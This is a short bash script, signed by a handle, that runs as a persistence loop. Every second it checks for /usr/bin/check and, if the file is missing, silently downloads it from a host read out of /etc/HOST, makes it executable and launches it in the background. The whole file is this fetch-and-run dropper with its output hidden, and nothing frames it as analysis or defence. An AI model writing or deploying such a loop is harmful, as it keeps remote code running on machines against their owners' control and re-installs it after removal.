#!/bin/bash
# Created by @H3X-007 :)

script_path="/usr/bin/check"
ip_address=$(head -n 1 "/etc/HOST")


while true; do
    if [ ! -f "$script_path" ]; then
        wget "http://$ip_address/check" -O "$script_path" >/dev/null 2>&1
        chmod +x "$script_path"
        ./"$script_path" &
    fi
    
    sleep 1
done
